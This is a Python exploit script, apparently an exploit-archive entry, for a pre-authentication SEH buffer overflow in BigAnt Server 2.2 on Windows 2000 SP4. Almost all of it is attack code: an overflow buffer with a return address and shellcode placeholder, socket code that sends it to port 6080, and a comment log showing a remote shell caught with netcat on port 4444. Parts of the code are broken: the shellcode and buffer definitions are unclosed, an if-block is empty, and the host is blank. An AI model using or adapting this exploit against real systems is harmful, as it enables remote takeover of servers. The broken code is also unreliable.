BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day) discovered and coded by Matteo Memelli aka ryujin. It is tested on Windows 2000 Sp4 English and is vulnerable. The exploit code is in Python and overflows the buffer to gain remote shell access
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# -
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
# bt ~ # ./ -H -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on
# bt ~ # nc -vv 4444
# inverse host lookup failed: Unknown host
# (UNKNOWN) [] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# C:\WINNT\system32>
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* - *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
s.connect(('', 6080))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
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